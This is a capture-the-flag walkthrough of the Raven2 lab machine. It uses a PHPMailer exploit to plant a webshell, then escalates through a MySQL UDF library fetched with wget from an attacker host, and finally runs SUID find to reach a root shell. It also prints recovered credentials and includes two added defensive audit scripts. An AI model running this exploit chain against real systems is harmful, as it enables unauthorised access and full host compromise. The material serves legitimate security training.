Target machine Raven2 / UDF privilege escalation

Raven2

Information gathering

Host discovery

Detailed scan

Backend directory scanning

dirsearch -u http://10.4.7.135 -x 403
# -x 403 excludes responses with status code 403 from the results

Webshell

Vulnerability discovery

  • Visit the directory found by the scan

    /vendor directory

    The site uses PHPMailer.

    PHPMailer is a PHP library for sending email. It provides a simple and flexible way to send mail, supports the SMTP, POP3 and IMAP protocols, and handles attachments, HTML content, mail authentication and other features. PHPMailer works with most mainstream mail servers and mail service providers and is one of the commonly used mail-sending tools in PHP development.

    The VERSION file shows version 5.2.16.

Vulnerability exploitation

  • Search for a matching exploit

    searchsploit phpmailer
    

    Download it

    searchsploit -m 40974.py
    
  • Read the exploit script and edit it

    • Set the target IP and append the vulnerable PHP page.

    • Set the Kali IP (the reverse-shell listener).

    • Change the path where the backdoor file is written.

      Save and exit. The vulnerable page is contact.php. Running the exploit writes a backdoor file icepeak.php into the web root.

  • Run the script

    python 40974.py
    

    The backdoor file was written successfully.

  • Start an nc listener on Kali

  • Browse to the webshell file the script created

    http://10.4.7.135/backdoor.php

  • Webshell obtained

Privilege escalation

Preparation for privilege escalation

  • The database credentials were found in the WordPress configuration file wp-config.php under /var/www/html/wordpress.

    Account: root

    Password: R@v3nSecurity

  • Try to log into the database

    mysql -uroot -pR@v3nSecurity
    
  • Inspect the database contents: two WordPress users are found

    michael  $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
    steven   LOLLOL1

  • steven's credentials allow logging in to the WordPress backend

    This does not help with privilege escalation.

  • Use LinEnum (a Linux enumeration and privilege escalation check script)
    Link: https://pan.baidu.com/s/1AT3PKicE05u6PsykiwCt-g?pwd=s8dt
    Extraction code: s8dt

    LinEnum shows that the MySQL service is running as root.

UDF privilege escalation

UDF privilege escalation prerequisites
  1. secure_file_priv in the MySQL configuration is empty. If it is NULL or points to a fixed directory such as /tmp/, the export location of the UDF file cannot be chosen freely and the technique cannot be used.

    show variables like '%secure%';
    # Shows where the server allows files to be exported

  2. The database user has CREATE and FILE privileges (root has all privileges by default).

  3. On Linux, the plugin directory must be writable.

  4. On Linux, UDF privilege escalation is largely confined to lab environments: with normal Linux permissions, neither the mysql user nor the web user can write to the plugin directory.
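The prerequisites above can be checked from the defender's side before anyone tries them. The script below is an added example and is not part of the original write-up; the function names, the ps -C mysqld and mysql -e collection commands in run_audit, and the sample inputs are assumptions for a typical Linux MySQL host. Each check returns 0 when the condition that favours the technique holds, so the verdict can also be consumed by cron or a configuration-management test.

```shell
#!/bin/sh
# udf_prereq_audit.sh -- added defender-side audit of the UDF preconditions.
# Not part of the original write-up. Function names, the live-collection
# commands in run_audit and the sample values are assumptions.

# MySQL reports secure_file_priv as "" (any path allowed), "NULL" (file
# import/export disabled) or a directory (export confined to that directory).
# Only the empty value lets a client pick the plugin directory as a target.
secure_file_priv_is_unrestricted() {
    [ -z "$1" ]
}

# Takes one "user comm" line as printed by: ps -C mysqld -o user=,comm=
# Returns 0 when the server process itself belongs to root.
mysqld_runs_as_root() {
    set -- $1                      # unquoted on purpose: split "user comm"
    [ "${1:-}" = "root" ] && [ "${2:-}" = "mysqld" ]
}

# Returns 0 when the plugin directory exists and is writable by the caller.
# Run it as the mysql user or the web user to mirror an attacker's position.
plugin_dir_is_writable() {
    [ -d "$1" ] && [ -w "$1" ]
}

# All three together: 0 means a .so could be written through the server and
# a function created from it would execute with root privileges.
udf_preconditions_met() {
    secure_file_priv_is_unrestricted "$1" \
        && mysqld_runs_as_root "$2" \
        && plugin_dir_is_writable "$3"
}

# Prints one PASS/FAIL line per precondition plus an overall verdict.
# Returns 1 when every precondition is present, 0 otherwise.
udf_risk_report() {
    sfp="$1"; ps_line="$2"; plugin_dir="$3"
    if secure_file_priv_is_unrestricted "$sfp"; then
        echo "FAIL secure_file_priv is empty: export path is unrestricted"
    else
        echo "PASS secure_file_priv='$sfp'"
    fi
    if mysqld_runs_as_root "$ps_line"; then
        echo "FAIL mysqld runs as root"
    else
        echo "PASS mysqld process line: '${ps_line:-not running}'"
    fi
    if plugin_dir_is_writable "$plugin_dir"; then
        echo "FAIL plugin_dir $plugin_dir is writable by $(id -un)"
    else
        echo "PASS plugin_dir $plugin_dir is not writable by $(id -un)"
    fi
    if udf_preconditions_met "$sfp" "$ps_line" "$plugin_dir"; then
        echo "VERDICT: all preconditions present, UDF privilege escalation is possible"
        return 1
    fi
    echo "VERDICT: at least one precondition is missing"
}

# Live collection; adjust credentials and socket for the host under review.
# A failed query yields UNKNOWN so that it is never mistaken for "" (empty).
run_audit() {
    sfp=$(mysql -N -B -e 'select @@secure_file_priv' 2>/dev/null || echo UNKNOWN)
    plugin_dir=$(mysql -N -B -e 'select @@plugin_dir' 2>/dev/null || echo /usr/lib/mysql/plugin)
    ps_line=$(ps -C mysqld -o user=,comm= 2>/dev/null | head -n 1)
    udf_risk_report "$sfp" "$ps_line" "$plugin_dir"
}

# Usage: sh udf_prereq_audit.sh --run
case "${1:-}" in --run) run_audit ;; esac
```

Each FAIL line maps to a fix: set secure_file_priv to a dedicated directory or to NULL, run mysqld under the unprivileged mysql account rather than root, and keep the plugin directory owned by root with no write bit for the mysql or web user.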

UDF privilege escalation principle

In MySQL, a UDF (user-defined function) is implemented as a dynamic link library file (also called a plugin file). A dynamic link library is an executable file that is loaded into memory while the program is running, linked with it, and provides additional functions.

UDF functions are usually written in a language such as C or C++ and compiled into a dynamic link library file. In MySQL these files use the .so (Linux) or .dll (Windows) extension. The file contains the code of the UDF function together with the libraries it needs, and MySQL can load it and call the function.

Privilege escalation process
  1. On Windows, MySQL generally runs with SYSTEM privileges, so UDF privilege escalation mostly results from a leaked or weak root password, or from ordinary users having write access to folders such as plugin.
  2. On Linux, the MySQL server process mysqld generally runs under the dedicated mysql account, while the mysqld_safe wrapper has root privileges. UDF privilege escalation is therefore rarer on Linux and only works when the mysqld process itself runs as root.
  3. For MySQL >= 5.1, the UDF dynamic link library must be placed in the lib\plugin folder of the MySQL installation directory before a custom function can be created. sqlmap and Metasploit ship dynamic link libraries for each platform. The ones bundled with sqlmap are encoded to evade antivirus detection and cannot be used directly; the cloak.py tool that comes with sqlmap decodes them.
  • View the privileges of the current database user

    select * from mysql.user where user = substring_index(user(), '@', 1)\G
    

Implementation

  • Find the plugin directory

    find / -name plugin
    

  • Use searchsploit to find the MySQL UDF exploit and download it

    searchsploit mysql udf
    searchsploit -m 1518.c
    

  • Read the usage notes in the exploit source

     * Usage:
     * $ id
     * uid=500(raptor) gid=500(raptor) groups=500(raptor)
     * $ gcc -g -c 1518.c
     # -g adds debugging information so the program can be debugged if it fails.
     # -c compiles the source into an object file without linking; object files end in .o or .obj.
     * $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
     # Link the 1518.o object file with the C standard library into a shared library named 1518.so.
     * $ mysql -uroot -pR@v3nSecurity
     * [...]
     * python -c 'import pty;pty.spawn("/bin/bash")'
     * mysql> use mysql;
     * mysql> create table foo(line blob);
     # Create a table named foo in the current database with a single column line of type blob (binary large object).
     * mysql> insert into foo values(load_file('/tmp/1518.so'));
     # Insert one row into foo whose value is the content of /tmp/1518.so read with load_file(), which returns the file's bytes.
     * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
     # Write the row's bytes out as 1518.so in the /usr/lib/mysql/plugin directory.
     * mysql> create function do_system returns integer soname '1518.so';
     # Create a MySQL function named do_system whose implementation lives in 1518.so.
     * mysql> select * from mysql.func;
     # Show the registered functions.
     * +-----------+-----+---------+----------+
     * | name      | ret | dl      | type     |
     * +-----------+-----+---------+----------+
     * | do_system |   2 | 1518.so | function |
     * +-----------+-----+---------+----------+
     * mysql> select do_system('chmod u+s /usr/bin/find');
     * find ./ aaa -exec '/bin/sh' \;
     * sh-2.05b$ cat /tmp/out
     * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     * [...]
     *
     * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
    
  • Compile on Kali

  • Spawn an interactive TTY on the target

    python -c 'import pty;pty.spawn("/bin/bash")'
    
    
  • Download 1518.so on the target

    cd /tmp
    wget http://10.4.7.132/1518.so
    

  • Load the dynamic link library as a UDF

    mysql -uroot -pR@v3nSecurity
    use mysql;
    create table foo(line blob);
    insert into foo values(load_file('/tmp/1518.so'));
    select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
    create function do_system returns integer soname '1518.so';
    select * from mysql.func;
    

  • Execute a system command through the UDF to set the SUID bit on find

    select do_system('chmod u+s /usr/bin/find');
    

  • Escalate with SUID find

    find / abc -exec '/bin/sh' \;
    # \; terminates the -exec command; find runs it once for each matched file or directory.
    

    Root privileges obtained.
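The chain above leaves two durable artifacts on the host: a row in mysql.func that points at a shared object in the plugin directory, and a SUID bit on a binary that did not have one before. The script below is an added detection example and is not part of the original write-up; the function names, the baseline file path and the constructed sample rows are assumptions. It is written for plain sh so it can run on the target itself.

```shell
#!/bin/sh
# udf_artifact_check.sh -- added detection for persisted UDFs and new SUID
# binaries. Not part of the original write-up; function names, the baseline
# path and the sample data are assumptions/constructed for illustration.

# Input: rows of "name<TAB>dl" as printed by
#   mysql -N -B -e "select name, dl from mysql.func"
# and a space-separated allowlist of shared-object names that are expected.
# Prints one line per function whose .so is not allowlisted.
# Returns 0 when nothing unexpected was found, 1 otherwise.
unexpected_udfs() {
    rows="$1"; allow="$2"; found=0
    while IFS="$(printf '\t')" read -r name dl; do
        [ -z "$name" ] && continue
        case " $allow " in
            *" $dl "*) [ -n "$dl" ] && continue ;;   # known, expected library
        esac
        printf 'unexpected UDF: %s -> %s\n' "$name" "$dl"
        found=1
    done <<EOF
$rows
EOF
    [ "$found" -eq 0 ]
}

# Input: two newline-separated lists of SUID file paths (baseline, current).
# Prints every path that is SUID now but was not in the baseline.
new_suid_binaries() {
    baseline="$1"; current="$2"
    while read -r path; do
        [ -z "$path" ] && continue
        printf '%s\n' "$baseline" | grep -qxF -- "$path" || printf '%s\n' "$path"
    done <<EOF
$current
EOF
}

# Live run: first invocation records the SUID baseline (assumed path below),
# later invocations report deviations and any non-allowlisted mysql.func row.
collect_and_report() {
    baseline_file="${1:-/var/lib/suid-baseline.txt}"    # assumed location
    allow="${2:-}"
    rows=$(mysql -N -B -e 'select name, dl from mysql.func' 2>/dev/null || true)
    unexpected_udfs "$rows" "$allow" || echo "review the mysql.func rows above"
    current=$(find / -xdev -type f -perm -4000 2>/dev/null)
    if [ -r "$baseline_file" ]; then
        new_suid_binaries "$(cat "$baseline_file")" "$current"
    else
        printf '%s\n' "$current" > "$baseline_file"
        echo "baseline written to $baseline_file"
    fi
}

# Usage: sh udf_artifact_check.sh --run [baseline_file] ["allowed.so other.so"]
case "${1:-}" in --run) collect_and_report "${2:-}" "${3:-}" ;; esac
```

On a host that legitimately uses a UDF library (for example lib_mysqludf_sys.so, which the exploit's own note points to), put that file name on the allowlist; every other entry in mysql.func deserves a look, because the table survives a server restart and is the simplest indicator that this technique was used.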

Summary

  • UDF privilege escalation via a dynamic link library
  • find privilege escalation
  • suid